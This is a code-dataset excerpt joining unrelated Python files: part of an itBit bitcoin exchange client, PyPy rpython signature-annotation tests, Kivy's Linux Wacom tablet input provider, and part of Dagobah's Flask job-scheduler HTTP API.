for raw_order in raw_orders:
mode = self._order_mode_to_const(raw_order['side'])
volume = Money(raw_order['amount'], 'BTC')
volume_filled = Money(raw_order['amountFilled'], 'BTC')
volume_remaining = volume - volume_filled
order = {
'mode': mode,
'id': str(raw_order['id']),
'price': Money(raw_order['price'], 'USD'),
'volume': volume,
'volume_remaining': volume_remaining,
'status': raw_order['status']
}
orders.append(order)
return orders
# Common Exchange Methods
def auth_request(self, req_method, url, request_args):
"""
This modifies request_args.
"""
try:
self.api_key
self.secret
except AttributeError:
self.api_key = self._load_env('ITBIT_BTC_USD_API_KEY')
self.secret = self._load_env('ITBIT_BTC_USD_API_SECRET').encode('utf-8')
timestamp = int(round(time.time() * 1000))
nonce = self.nonce
body = ''
if 'data' in request_args:
body = json.dumps(request_args['data'])
request_args['data'] = body
message = self._auth_create_message(req_method, url, body, nonce, timestamp)
sig = self._auth_sign_message(message, nonce, url, self.secret)
if 'headers' not in request_args:
request_args['headers'] = {}
headers = request_args['headers']
headers['Authorization'] = self.api_key + ':' + sig
headers['X-Auth-Timestamp'] = str(timestamp)
headers['X-Auth-Nonce'] = str(nonce)
headers['Content-Type'] = 'application/json'
def _auth_create_message(self, verb, url, body, nonce, timestamp):
return json.dumps(
[verb.upper(), url, body, str(nonce), str(timestamp)],
separators=(',', ':'),
)
def _auth_sign_message(self, message, nonce, url, api_secret):
sha256_hash = hashlib.sha256()
nonced_message = str(nonce) + message
sha256_hash.update(nonced_message)
hash_digest = sha256_hash.digest()
msg_to_hmac = url.encode('utf8') + hash_digest
hmac_digest = hmac.new(api_secret, msg_to_hmac, hashlib.sha512).digest()
sig = base64.b64encode(hmac_digest)
return sig
def get_balance_req(self):
try:
self.user_id
except AttributeError:
self.user_id = self._load_env('ITBIT_BTC_USD_USER_ID')
return self.req('get', '/wallets/%s' % self.wallet_id)
def get_balance_resp(self, req):
response = self.resp(req)
raw_balances = response['balances']
btc_available = None
usd_available = None
for raw_balance in raw_balances:
if raw_balance['currency'] == 'XBT':
btc_available = Money(raw_balance['availableBalance'], 'BTC')
elif raw_balance['currency'] == 'USD':
usd_available = Money(raw_balance['availableBalance'], 'USD')
if btc_available is None or usd_available is None:
raise exceptions.ExchangeAPIErrorException(
self,
'missing expected balances',
)
balance = Balance()
balance['BTC'] = btc_available
balance['USD'] = usd_available
return balance
def get_ticker_req(self, verify=True):
return self.req(
'get',
'/markets/XBTUSD/ticker',
no_auth=True,
verify=verify,
)
def get_ticker_resp(self, req):
response = self.resp(req)
return {
'high': Money(response['high24h'], 'USD'),
'low': Money(response['low24h'], 'USD'),
'last': Money(response['lastPrice'], 'USD'),
'volume': Money(response['volume24h'], 'BTC')
}
def _get_orderbook_from_api_req(self, verify=True):
return self.req(
'get',
'/markets/XBTUSD/order_book',
no_auth=True,
verify=verify,
)
def place_order_req(self, mode, volume, price=None, order_type=order_types.LIMIT_ORDER):
side = self._order_mode_from_const(mode)
if price.currency != 'USD':
raise ValueError('price must be in USD')
if volume.currency != 'BTC':
raise ValueError('volume must be in BTC')
# Truncate the volume instead of rounding it because it's better# to trade too
# little than too much.
volume = volume.round_to_decimal_places(8, rounding=cdecimal.ROUND_DOWN)
volume_str = '%.8f' % volume.amount
price_str = '%.2f' % price.amount
payload = {
'type': 'limit',
'currency': 'XBT',
'side': side,
'amount': volume_str,
'price': price_str,
'instrument': 'XBTUSD'
}
return self.req(
'post',
'/wallets/%s/orders/' % self.wallet_id,
data=payload,
)
def place_order_resp(self, req):
response = self.resp(req)
try:
order_id = str(response['id'])
return {'success': True, 'order_id': order_id}
except KeyError:
raise exceptions.ExchangeAPIErrorException(
self,
'response does not contain an order id',
)
def get_open_orders_req(self):
return self.all_orders_req(status='open')
def get_open_orders_resp(self, req):
open_orders = self.all_orders_resp(req)
for o in open_orders:
del o['status']
return open_orders
def get_order_details(self, order_id):
req = self.get_order_details_req()
return self.get_order_details_resp(req, order_id)
def get_order_details_req(self):
return self.get_multi_order_details_req()
def get_order_details_resp(self, req, order_id):
return self.get_multi_order_details_resp(req, [order_id])[order_id]
def get_multi_order_details(self, order_ids):
req = self.get_multi_order_details_req()
return self.get_multi_order_details_resp(req, order_ids)
def get_multi_order_details_req(self):
return self.trades_for_orders_req()
def get_multi_order_details_resp(self, req, order_ids):
# This is modeled after Bitstamp, where we get the order details from the
# trades endpoint directly. The caveat is that order_details will only work
# for the most recent 50 trades. Since we are always accounting trades right
# after they happen, this should be ok (and also affects Bitstamp).
order_ids = [str(o) for o in order_ids]
multi_trades = self.trades_for_orders_resp(req, order_ids)
data = {}
for order_id in order_ids:
total_usd = Money('0', 'USD')
total_btc = Money('0', 'BTC')
our_trades = []
our_type = None
if order_id in multi_trades:
trades = multi_trades[order_id]
for t in trades:
assert(t['currency1'] == 'XBT')
btc_amount = Money(t['currency1Amount'], 'BTC')
assert(t['currency2'] == 'USD')
usd_amount = Money(t['currency2Amount'], 'USD')
# This might also come back as XBT, but since ItBit has 0-fee
# trading right now, I can't tell.
assert(t['commissionCurrency'] == 'USD')
fee = Money(t['commissionPaid'], 'USD')
total_usd += usd_amount
total_btc += btc_amount
our_type = self._order_mode_to_const(t['direction'])
our_trades.append({
'time': parse(t['timestamp']).epoch,
'trade_id': None,
'fee': fee,
'btc': btc_amount,
'fiat': usd_amount,
})
time_created = None
if our_trades:
time_created = min([t['time'] for t in our_trades])
data[order_id] = {
'time_created': time_created,
'type': our_type,
'btc_total': total_btc,
'fiat_total': total_usd,
'trades': our_trades
}
return data
def cancel_order_req(self, order_id):
return self.req(
'delete',
'/wallets/%s/orders/%s' % (self.wallet_id, order_id),
)
def cancel_order_resp(self, req):
# In the success case, no response is given but we need to call resp() so it
# can catch any error cases.
response = self.resp(req) # noqa
return {'success': True}
def withdraw_crypto_req(self, address, volume):
if not isinstance(address, basestring):
raise TypeError('Withdrawal address must be a string')
if not isinstance(volume, Money) or volume.currency != self.volume_currency:
raise TypeError('Withdrawal volume must be in %s' % self.volume_currency)
volume_str = '%.8f' % volume.amount
payload = {
'currency': 'XBT',
'amount': volume_str,
'address': address,
}
return self.req(
'post',
'/wallets/%s/cryptocurrency_withdrawals' % self.wallet_id,
data=payload,
)
def withdraw_crypto_resp(self, req):
response = self.resp(req)
return {'success': True, 'exchange_withdrawal_id': response['withdrawalId']}
def get_order_audit_data(self, skip_recent=0, page=1):
"""
Returns an OrderedDict of order ids mapped to their filled volume (only include
orders that have some trades).
Dropped the skip_recent flag because we don't seem to be using it anywhere.
"""
if skip_recent != 0:
raise ValueEror('skip_recent is deprecated')
orders = OrderedDict()
trades_to_audit = self.all_trades(page=page)
for trade in trades_to_audit:
order_id = str(trade['orderId'])
assert(trade['currency1'] == 'XBT')
trade_amount = abs(Money(trade['currency1Amount'], 'BTC'))
try:
orders[order_id] += trade_amount
except KeyError:
orders[order_id] = trade_amount
# Remove the oldest 2 orders, because its trades might be wrapped around a
# page gap and this would give us an innacurate volume_filled number.
# We need to remove 2 because there could be an ask and a bid.
try:
orders.popitem()
orders.popitem()
except KeyError:
pass
return orders
def fiat_deposit_fee(self, deposit_amount):
return Money('5', 'USD')
def fiat_withdrawal_fee(self, withdrawal_amount):
"""
Itbit fee is from their documentation, and an extra $15 is being charged to us
before it shows up in our bank account (as of the September 2016), so I assume
that's an intermediary fee.
The fee should be a flat $50 on withdrawals > $10k, but we'll see.
"""
fee = Money('0', 'USD')
if withdrawal_amount < Money('10,000', 'USD'):
itbit_fee = Money('15', 'USD')
intermediary_fee = Money('15', 'USD')
fee = itbit_fee + intermediary_fee
else:
fee = Money('50', 'USD')
return fee
|
rpython/rlib/test/test_signature.py
|
nanjekyejoannah/pypy
| 333 |
66729
|
import py
from rpython.rlib.signature import signature, finishsigs, FieldSpec, ClassSpec
from rpython.rlib import types
from rpython.annotator import model
from rpython.rtyper.llannotation import SomePtr
from rpython.annotator.signature import SignatureError
from rpython.translator.translator import TranslationContext, graphof
from rpython.rtyper.lltypesystem import rstr
from rpython.rtyper.annlowlevel import LowLevelAnnotatorPolicy
def annotate_at(f, policy=None):
t = TranslationContext()
t.config.translation.check_str_without_nul = True
a = t.buildannotator(policy=policy)
a.annotate_helper(f, [model.s_ImpossibleValue]*f.__code__.co_argcount, policy=policy)
return a
def sigof(a, f):
# returns [param1, param2, ..., ret]
g = graphof(a.translator, f)
return [a.binding(v) for v in g.startblock.inputargs] + [a.binding(g.getreturnvar())]
def getsig(f, policy=None):
a = annotate_at(f, policy=policy)
return sigof(a, f)
def check_annotator_fails(caller):
exc = py.test.raises(model.AnnotatorError, annotate_at, caller).value
assert caller.__name__ in str(exc)
def test_bookkeeping():
@signature('x', 'y', returns='z')
def f(a, b):
return a + len(b)
f.foo = 'foo'
assert f._signature_ == (('x', 'y'), 'z')
assert f.__name__ == 'f'
assert f.foo == 'foo'
assert f(1, 'hello') == 6
def test_basic():
@signature(types.int(), types.str(), returns=types.char())
def f(a, b):
return b[a]
assert getsig(f) == [model.SomeInteger(), model.SomeString(), model.SomeChar()]
def test_arg_errors():
@signature(types.int(), types.str(), returns=types.int())
def f(a, b):
return a + len(b)
@check_annotator_fails
def ok_for_body(): # would give no error without signature
f(2.0, 'b')
@check_annotator_fails
def bad_for_body(): # would give error inside 'f' body, instead errors at call
f('a', 'b')
def test_return():
@signature(returns=types.str())
def f():
return 'a'
assert getsig(f) == [model.SomeString()]
@signature(types.str(), returns=types.str())
def f(x):
return x
def g():
return f('a')
a = annotate_at(g)
assert sigof(a, f) == [model.SomeString(), model.SomeString()]
def test_return_errors():
@check_annotator_fails
@signature(returns=types.int())
def int_not_char():
return 'a'
@check_annotator_fails
@signature(types.str(), returns=types.int())
def str_to_int(s):
return s
@signature(returns=types.str())
def str_not_None():
return None
@check_annotator_fails
def caller_of_str_not_None():
return str_not_None()
@py.test.mark.xfail
def test_return_errors_xfail():
@check_annotator_fails
@signature(returns=types.str())
def str_not_None():
return None
def test_none():
@signature(returns=types.none())
def f():
pass
assert getsig(f) == [model.s_None]
def test_float():
@signature(types.longfloat(), types.singlefloat(), returns=types.float())
def f(a, b):
return 3.0
assert getsig(f) == [model.SomeLongFloat(), model.SomeSingleFloat(), model.SomeFloat()]
def test_unicode():
@signature(types.unicode(), returns=types.int())
def f(u):
return len(u)
assert getsig(f) == [model.SomeUnicodeString(), model.SomeInteger()]
def test_str0():
@signature(types.unicode0(), returns=types.str0())
def f(u):
return 'str'
assert getsig(f) == [model.SomeUnicodeString(no_nul=True),
model.SomeString(no_nul=True)]
def test_ptr():
policy = LowLevelAnnotatorPolicy()
@signature(types.ptr(rstr.STR), returns=types.none())
def f(buf):
pass
argtype = getsig(f, policy=policy)[0]
assert isinstance(argtype, SomePtr)
assert argtype.ll_ptrtype.TO == rstr.STR
def g():
f(rstr.mallocstr(10))
getsig(g, policy=policy)
def test_list():
@signature(types.list(types.int()), returns=types.int())
def f(a):
return len(a)
argtype = getsig(f)[0]
assert isinstance(argtype, model.SomeList)
item = argtype.listdef.listitem
assert item.s_value == model.SomeInteger()
assert item.resized == True
@check_annotator_fails
def ok_for_body():
f(['a'])
@check_annotator_fails
def bad_for_body():
f('a')
@signature(returns=types.list(types.char()))
def ff():
return ['a']
@check_annotator_fails
def mutate_broader():
ff()[0] = 'abc'
@check_annotator_fails
def mutate_unrelated():
ff()[0] = 1
@check_annotator_fails
@signature(types.list(types.char()), returns=types.int())
def mutate_in_body(l):
l[0] = 'abc'
return len(l)
def can_append():
l = ff()
l.append('b')
getsig(can_append)
def test_array():
@signature(returns=types.array(types.int()))
def f():
return [1]
rettype = getsig(f)[0]
assert isinstance(rettype, model.SomeList)
item = rettype.listdef.listitem
assert item.s_value == model.SomeInteger()
assert item.resized == False
def try_append():
l = f()
l.append(2)
check_annotator_fails(try_append)
def test_dict():
@signature(returns=types.dict(types.str(), types.int()))
def f():
return {'a': 1, 'b': 2}
rettype = getsig(f)[0]
assert isinstance(rettype, model.SomeDict)
assert rettype.dictdef.dictkey.s_value == model.SomeString()
assert rettype.dictdef.dictvalue.s_value == model.SomeInteger()
def test_instance():
class C1(object):
pass
class C2(C1):
pass
class C3(C2):
pass
@signature(types.instance(C3), returns=types.instance(C2))
def f(x):
assert isinstance(x, C2)
return x
argtype, rettype = getsig(f)
assert isinstance(argtype, model.SomeInstance)
assert argtype.classdef.classdesc.pyobj == C3
assert isinstance(rettype, model.SomeInstance)
assert rettype.classdef.classdesc.pyobj == C2
@check_annotator_fails
def ok_for_body():
f(C2())
@check_annotator_fails
def bad_for_body():
f(C1())
@check_annotator_fails
def ok_for_body():
f(None)
def test_instance_or_none():
class C1(object):
pass
class C2(C1):
pass
class C3(C2):
pass
@signature(types.instance(C3, can_be_None=True), returns=types.instance(C2, can_be_None=True))
def f(x):
assert isinstance(x, C2) or x is None
return x
argtype, rettype = getsig(f)
assert isinstance(argtype, model.SomeInstance)
assert argtype.classdef.classdesc.pyobj == C3
assert argtype.can_be_None
assert isinstance(rettype, model.SomeInstance)
assert rettype.classdef.classdesc.pyobj == C2
assert rettype.can_be_None
@check_annotator_fails
def ok_for_body():
f(C2())
@check_annotator_fails
def bad_for_body():
f(C1())
def test_self():
@finishsigs
class C(object):
@signature(types.self(), types.self(), returns=types.none())
def f(self, other):
pass
class D1(C):
pass
class D2(C):
pass
def g():
D1().f(D2())
a = annotate_at(g)
argtype = sigof(a, C.__dict__['f'])[0]
assert isinstance(argtype, model.SomeInstance)
assert argtype.classdef.classdesc.pyobj == C
def test_self_error():
class C(object):
@signature(types.self(), returns=types.none())
def incomplete_sig_meth(self):
pass
exc = py.test.raises(SignatureError, annotate_at, C.incomplete_sig_meth).value
assert 'incomplete_sig_meth' in str(exc)
assert 'finishsigs' in str(exc)
def test_any_as_argument():
@signature(types.any(), types.int(), returns=types.float())
def f(x, y):
return x + y
@signature(types.int(), returns=types.float())
def g(x):
return f(x, x)
sig = getsig(g)
assert sig == [model.SomeInteger(), model.SomeFloat()]
@signature(types.float(), returns=types.float())
def g(x):
return f(x, 4)
sig = getsig(g)
assert sig == [model.SomeFloat(), model.SomeFloat()]
@signature(types.str(), returns=types.int())
def cannot_add_string(x):
return f(x, 2)
exc = py.test.raises(model.AnnotatorError, annotate_at, cannot_add_string).value
assert 'Blocked block' in str(exc)
def test_return_any():
@signature(types.int(), returns=types.any())
def f(x):
return x
sig = getsig(f)
assert sig == [model.SomeInteger(), model.SomeInteger()]
@signature(types.str(), returns=types.any())
def cannot_add_string(x):
return f(3) + x
exc = py.test.raises(model.AnnotatorError, annotate_at, cannot_add_string).value
assert 'Blocked block' in str(exc)
assert 'cannot_add_string' in str(exc)
@py.test.mark.xfail
def test_class_basic():
class C(object):
_fields_ = ClassSpec({'x': FieldSpec(types.int)})
def wrong_type():
c = C()
c.x = 'a'
check_annotator_fails(wrong_type)
def bad_field():
c = C()
c.y = 3
check_annotator_fails(bad_field)
@py.test.mark.xfail
def test_class_shorthand():
class C1(object):
_fields_ = {'x': FieldSpec(types.int)}
def wrong_type_1():
c = C1()
c.x = 'a'
check_annotator_fails(wrong_type_1)
class C2(object):
_fields_ = ClassSpec({'x': types.int})
def wrong_type_2():
c = C2()
c.x = 'a'
check_annotator_fails(wrong_type_1)
@py.test.mark.xfail
def test_class_inherit():
class C(object):
_fields_ = ClassSpec({'x': FieldSpec(types.int)})
class C1(object):
_fields_ = ClassSpec({'y': FieldSpec(types.int)})
class C2(object):
_fields_ = ClassSpec({'y': FieldSpec(types.int)}, inherit=True)
def no_inherit():
c = C1()
c.x = 3
check_annotator_fails(no_inherit)
def good():
c = C2()
c.x = 3
annotate_at(good)
def wrong_type():
c = C2()
c.x = 'a'
check_annotator_fails(wrong_type)
|
kivy/input/providers/linuxwacom.py
|
VICTORVICKIE/kivy
| 13,889 |
66757
|
<filename>kivy/input/providers/linuxwacom.py
'''
Native support of Wacom tablet from linuxwacom driver
=====================================================
To configure LinuxWacom, add this to your configuration::
[input]
pen = linuxwacom,/dev/input/event2,mode=pen
finger = linuxwacom,/dev/input/event3,mode=touch
.. note::
You must have read access to the input event.
You can use a custom range for the X, Y and pressure values.
On some drivers, the range reported is invalid.
To fix that, you can add these options to the argument line:
* invert_x : 1 to invert X axis
* invert_y : 1 to invert Y axis
* min_position_x : X minimum
* max_position_x : X maximum
* min_position_y : Y minimum
* max_position_y : Y maximum
* min_pressure : pressure minimum
* max_pressure : pressure maximum
'''
__all__ = ('LinuxWacomMotionEventProvider', 'LinuxWacomMotionEvent')
import os
from kivy.input.motionevent import MotionEvent
from kivy.input.shape import ShapeRect
class LinuxWacomMotionEvent(MotionEvent):
def depack(self, args):
self.is_touch = True
self.sx = args['x']
self.sy = args['y']
self.profile = ['pos']
if 'size_w' in args and 'size_h' in args:
self.shape = ShapeRect()
self.shape.width = args['size_w']
self.shape.height = args['size_h']
self.profile.append('shape')
if 'pressure' in args:
self.pressure = args['pressure']
self.profile.append('pressure')
super(LinuxWacomMotionEvent, self).depack(args)
def __str__(self):
return '<LinuxWacomMotionEvent id=%d pos=(%f, %f) device=%s>' \
% (self.id, self.sx, self.sy, self.device)
if 'KIVY_DOC' in os.environ:
# documentation hack
LinuxWacomMotionEventProvider = None
else:
import threading
import collections
import struct
import fcntl
from kivy.input.provider import MotionEventProvider
from kivy.input.factory import MotionEventFactory
from kivy.logger import Logger
#
# This part is taken from linux-source-2.6.32/include/linux/input.h
#
# Event types
EV_SYN = 0x00
EV_KEY = 0x01
EV_REL = 0x02
EV_ABS = 0x03
EV_MSC = 0x04
EV_SW = 0x05
EV_LED = 0x11
EV_SND = 0x12
EV_REP = 0x14
EV_FF = 0x15
EV_PWR = 0x16
EV_FF_STATUS = 0x17
EV_MAX = 0x1f
EV_CNT = (EV_MAX + 1)
KEY_MAX = 0x2ff
# Synchronization events
SYN_REPORT = 0
SYN_CONFIG = 1
SYN_MT_REPORT = 2
# Misc events
MSC_SERIAL = 0x00
MSC_PULSELED = 0x01
MSC_GESTURE = 0x02
MSC_RAW = 0x03
MSC_SCAN = 0x04
MSC_MAX = 0x07
MSC_CNT = (MSC_MAX + 1)
ABS_X = 0x00
ABS_Y = 0x01
ABS_PRESSURE = 0x18
ABS_MISC = 0x28 # if 0, it's touch up
ABS_MT_TOUCH_MAJOR = 0x30 # Major axis of touching ellipse
ABS_MT_TOUCH_MINOR = 0x31 # Minor axis (omit if circular)
ABS_MT_WIDTH_MAJOR = 0x32 # Major axis of approaching ellipse
ABS_MT_WIDTH_MINOR = 0x33 # Minor axis (omit if circular)
ABS_MT_ORIENTATION = 0x34 # Ellipse orientation
ABS_MT_POSITION_X = 0x35 # Center X ellipse position
ABS_MT_POSITION_Y = 0x36 # Center Y ellipse position
ABS_MT_TOOL_TYPE = 0x37 # Type of touching device
ABS_MT_BLOB_ID = 0x38 # Group a set of packets as a blob
ABS_MT_TRACKING_ID = 0x39 # Unique ID of initiated contact
ABS_MT_PRESSURE = 0x3a # Pressure on contact area
# some ioctl base (with 0 value)
EVIOCGNAME = 2147501318
EVIOCGBIT = 2147501344
EVIOCGABS = 2149074240
# sizeof(struct input_event)
struct_input_event_sz = struct.calcsize('LLHHi')
struct_input_absinfo_sz = struct.calcsize('iiiiii')
sz_l = struct.calcsize('Q')
class LinuxWacomMotionEventProvider(MotionEventProvider):
options = ('min_position_x', 'max_position_x',
'min_position_y', 'max_position_y',
'min_pressure', 'max_pressure',
'invert_x', 'invert_y')
def __init__(self, device, args):
super(LinuxWacomMotionEventProvider, self).__init__(device, args)
self.input_fn = None
self.default_ranges = dict()
self.mode = 'touch'
# split arguments
args = args.split(',')
if not args:
Logger.error('LinuxWacom: No filename given in config')
Logger.error('LinuxWacom: Use /dev/input/event0 for example')
return
# read filename
self.input_fn = args[0]
Logger.info('LinuxWacom: Read event from <%s>' % self.input_fn)
# read parameters
for arg in args[1:]:
if arg == '':
continue
arg = arg.split('=')
# ensure it's a key = value
if len(arg) != 2:
err = 'LinuxWacom: Bad parameter' \
'%s: Not in key=value format.' % arg
Logger.error(err)
continue
# ensure the key exist
key, value = arg
if key == 'mode':
self.mode = value
continue
if key not in LinuxWacomMotionEventProvider.options:
Logger.error('LinuxWacom: unknown %s option' % key)
continue
# ensure the value
try:
self.default_ranges[key] = int(value)
except ValueError:
err = 'LinuxWacom: value %s invalid for %s' % (key, value)
Logger.error(err)
continue
# all good!
msg = 'LinuxWacom: Set custom %s to %d' % (key, int(value))
Logger.info(msg)
Logger.info('LinuxWacom: mode is <%s>' % self.mode)
def start(self):
if self.input_fn is None:
return
self.uid = 0
self.queue = collections.deque()
self.thread = threading.Thread(
target=self._thread_run,
kwargs=dict(
queue=self.queue,
input_fn=self.input_fn,
device=self.device,
default_ranges=self.default_ranges))
self.thread.daemon = True
self.thread.start()
def _thread_run(self, **kwargs):
input_fn = kwargs.get('input_fn')
queue = kwargs.get('queue')
device = kwargs.get('device')
drs = kwargs.get('default_ranges').get
touches = {}
touches_sent = []
l_points = {}
# prepare some vars to get limit of some component
range_min_position_x = 0
range_max_position_x = 2048
range_min_position_y = 0
range_max_position_y = 2048
range_min_pressure = 0
range_max_pressure = 255
invert_x = int(bool(drs('invert_x', 0)))
invert_y = int(bool(drs('invert_y', 0)))
reset_touch = False
def process(points):
actives = list(points.keys())
for args in points.values():
tid = args['id']
try:
touch = touches[tid]
except KeyError:
touch = LinuxWacomMotionEvent(device, tid, args)
touches[touch.id] = touch
if touch.sx == args['x'] \
and touch.sy == args['y'] \
and tid in touches_sent:
continue
touch.move(args)
if tid not in touches_sent:
queue.append(('begin', touch))
touches_sent.append(tid)
queue.append(('update', touch))
for tid in list(touches.keys())[:]:
if tid not in actives:
touch = touches[tid]
if tid in touches_sent:
touch.update_time_end()
queue.append(('end', touch))
touches_sent.remove(tid)
del touches[tid]
def normalize(value, vmin, vmax):
return (value - vmin) / float(vmax - vmin)
# open the input
try:
fd = open(input_fn, 'rb')
except IOError:
Logger.exception('Unable to open %s' % input_fn)
return
# get the controller name (EVIOCGNAME)
device_name = fcntl.ioctl(fd, EVIOCGNAME + (256 << 16),
" " * 256).split('\x00')[0]
Logger.info('LinuxWacom: using <%s>' % device_name)
# get abs infos
bit = fcntl.ioctl(fd, EVIOCGBIT + (EV_MAX << 16), ' ' * sz_l)
bit, = struct.unpack('Q', bit)
for x in range(EV_MAX):
# preserve this, we may want other things than EV_ABS
if x != EV_ABS:
continue
# EV_ABS available for this device ?
if (bit & (1 << x)) == 0:
continue
# ask abs info keys to the devices
sbit = fcntl.ioctl(fd, EVIOCGBIT + x + (KEY_MAX << 16),
' ' * sz_l)
sbit, = struct.unpack('Q', sbit)
for y in range(KEY_MAX):
if (sbit & (1 << y)) == 0:
continue
absinfo = fcntl.ioctl(fd, EVIOCGABS + y +
(struct_input_absinfo_sz << 16),
' ' * struct_input_absinfo_sz)
abs_value, abs_min, abs_max, abs_fuzz, \
abs_flat, abs_res = struct.unpack('iiiiii', absinfo)
if y == ABS_X:
range_min_position_x = drs('min_position_x', abs_min)
range_max_position_x = drs('max_position_x', abs_max)
Logger.info('LinuxWacom: ' +
'<%s> range position X is %d - %d' % (
device_name, abs_min, abs_max))
elif y == ABS_Y:
range_min_position_y = drs('min_position_y', abs_min)
range_max_position_y = drs('max_position_y', abs_max)
Logger.info('LinuxWacom: ' +
'<%s> range position Y is %d - %d' % (
device_name, abs_min, abs_max))
elif y == ABS_PRESSURE:
range_min_pressure = drs('min_pressure', abs_min)
range_max_pressure = drs('max_pressure', abs_max)
Logger.info('LinuxWacom: ' +
'<%s> range pressure is %d - %d' % (
device_name, abs_min, abs_max))
# read until the end
changed = False
touch_id = 0
touch_x = 0
touch_y = 0
touch_pressure = 0
while fd:
data = fd.read(struct_input_event_sz)
if len(data) < struct_input_event_sz:
break
# extract each event
for i in range(len(data) / struct_input_event_sz):
ev = data[i * struct_input_event_sz:]
# extract timeval + event infos
tv_sec, tv_usec, ev_type, ev_code, ev_value = \
struct.unpack('LLHHi', ev[:struct_input_event_sz])
if ev_type == EV_SYN and ev_code == SYN_REPORT:
if touch_id in l_points:
p = l_points[touch_id]
else:
p = dict()
l_points[touch_id] = p
p['id'] = touch_id
if not reset_touch:
p['x'] = touch_x
p['y'] = touch_y
p['pressure'] = touch_pressure
if self.mode == 'pen' \
and touch_pressure == 0 \
and not reset_touch:
del l_points[touch_id]
if changed:
if 'x' not in p:
reset_touch = False
continue
process(l_points)
changed = False
if reset_touch:
l_points.clear()
reset_touch = False
process(l_points)
elif ev_type == EV_MSC and ev_code == MSC_SERIAL:
touch_id = ev_value
elif ev_type == EV_ABS and ev_code == ABS_X:
val = normalize(ev_value,
range_min_position_x,
range_max_position_x)
if invert_x:
val = 1. - val
touch_x = val
changed = True
elif ev_type == EV_ABS and ev_code == ABS_Y:
val = 1. - normalize(ev_value,
range_min_position_y,
range_max_position_y)
if invert_y:
val = 1. - val
touch_y = val
changed = True
elif ev_type == EV_ABS and ev_code == ABS_PRESSURE:
touch_pressure = normalize(ev_value,
range_min_pressure,
range_max_pressure)
changed = True
elif ev_type == EV_ABS and ev_code == ABS_MISC:
if ev_value == 0:
reset_touch = True
def update(self, dispatch_fn):
# dispatch all event from threads
try:
while True:
event_type, touch = self.queue.popleft()
dispatch_fn(event_type, touch)
except:
pass
MotionEventFactory.register('linuxwacom', LinuxWacomMotionEventProvider)
|
dagobah/daemon/api.py
|
usertesting/dagobah
| 574 |
66788
|
<reponame>usertesting/dagobah<filename>dagobah/daemon/api.py
""" HTTP API methods for Dagobah daemon. """
import StringIO
import json
from flask import request, abort, send_file
from flask_login import login_required
from .daemon import app
from .util import validate_dict, api_call, allowed_file
dagobah = app.config['dagobah']
@app.route('/api/jobs', methods=['GET'])
@login_required
@api_call
def get_jobs():
return dagobah._serialize().get('jobs', {})
@app.route('/api/job', methods=['GET'])
@login_required
@api_call
def get_job():
args = dict(request.args)
if not validate_dict(args,
required=['job_name'],
job_name=str):
abort(400)
job = dagobah.get_job(args['job_name'])
if not job:
abort(400)
return job._serialize()
@app.route('/api/logs', methods=['GET'])
@login_required
@api_call
def get_run_log_history():
args = dict(request.args)
if not validate_dict(args,
required=['job_name', 'task_name'],
job_name=str,
task_name=str):
abort(400)
job = dagobah.get_job(args['job_name'])
task = job.tasks.get(args['task_name'], None)
if not task:
abort(400)
return task.get_run_log_history()
@app.route('/api/log', methods=['GET'])
@login_required
@api_call
def get_log():
args = dict(request.args)
if not validate_dict(args,
required=['job_name', 'task_name', 'log_id'],
job_name=str,
task_name=str,
log_id=str):
abort(400)
job = dagobah.get_job(args['job_name'])
task = job.tasks.get(args['task_name'], None)
if not task:
abort(400)
return task.get_run_log(args['log_id'])
@app.route('/api/head', methods=['GET'])
@login_required
@api_call
def head_task():
args = dict(request.args)
if not validate_dict(args,
required=['job_name', 'task_name'],
job_name=str,
task_name=str,
stream=str,
num_lines=int):
abort(400)
job = dagobah.get_job(args['job_name'])
task = job.tasks.get(args['task_name'], None)
if not task:
abort(400)
call_args = {}
for key in ['stream', 'num_lines']:
if key in args:
call_args[key] = args[key]
return task.head(**call_args)
@app.route('/api/tail', methods=['GET'])
@login_required
@api_call
def tail_task():
args = dict(request.args)
if not validate_dict(args,
required=['job_name', 'task_name'],
job_name=str,
task_name=str,
stream=str,
num_lines=int):
abort(400)
job = dagobah.get_job(args['job_name'])
task = job.tasks.get(args['task_name'], None)
if not task:
abort(400)
call_args = {}
for key in ['stream', 'num_lines']:
if key in args:
call_args[key] = args[key]
return task.tail(**call_args)
@app.route('/api/add_job', methods=['POST'])
@login_required
@api_call
def add_job():
args = dict(request.form)
if not validate_dict(args,
required=['job_name'],
job_name=str):
abort(400)
dagobah.add_job(args['job_name'])
@app.route('/api/delete_job', methods=['POST'])
@login_required
@api_call
def delete_job():
args = dict(request.form)
if not validate_dict(args,
required=['job_name'],
job_name=str):
abort(400)
dagobah.delete_job(args['job_name'])
@app.route('/api/start_job', methods=['POST'])
@login_required
@api_call
def start_job():
args = dict(request.form)
if not validate_dict(args,
required=['job_name'],
job_name=str):
abort(400)
job = dagobah.get_job(args['job_name'])
job.start()
@app.route('/api/retry_job', methods=['POST'])
@login_required
@api_call
def retry_job():
args = dict(request.form)
if not validate_dict(args,
required=['job_name'],
job_name=str):
abort(400)
job = dagobah.get_job(args['job_name'])
job.retry()
@app.route('/api/add_task_to_job', methods=['POST'])
@login_required
@api_call
def add_task_to_job():
args = dict(request.form)
if not validate_dict(args,
required=['job_name', 'task_command', 'task_name'],
job_name=str,
task_command=str,
task_name=str,
task_target=str):
abort(400)
dagobah.add_task_to_job(args['job_name'],
args['task_command'],
args['task_name'],
hostname=args.get("task_target", None))
@app.route('/api/delete_task', methods=['POST'])
@login_required
@api_call
def delete_task():
args = dict(request.form)
if not validate_dict(args,
required=['job_name', 'task_name'],
job_name=str,
task_name=str):
abort(400)
job = dagobah.get_job(args['job_name'])
job.delete_task(args['task_name'])
@app.route('/api/add_dependency', methods=['POST'])
@login_required
@api_call
def add_dependency():
args = dict(request.form)
if not validate_dict(args,
required=['job_name',
'from_task_name',
'to_task_name'],
job_name=str,
from_task_name=str,
to_task_name=str):
abort(400)
job = dagobah.get_job(args['job_name'])
job.add_dependency(args['from_task_name'], args['to_task_name'])
@app.route('/api/delete_dependency', methods=['POST'])
@login_required
@api_call
def delete_dependency():
args = dict(request.form)
if not validate_dict(args,
required=['job_name',
'from_task_name',
'to_task_name'],
job_name=str,
from_task_name=str,
to_task_name=str):
abort(400)
job = dagobah.get_job(args['job_name'])
job.delete_dependency(args['from_task_name'], args['to_task_name'])
@app.route('/api/schedule_job', methods=['POST'])
@login_required
@api_call
def schedule_job():
args = dict(request.form)
if not validate_dict(args,
required=['job_name', 'cron_schedule'],
job_name=str,
cron_schedule=str):
abort(400)
if args['cron_schedule'] == '':
args['cron_schedule'] = None
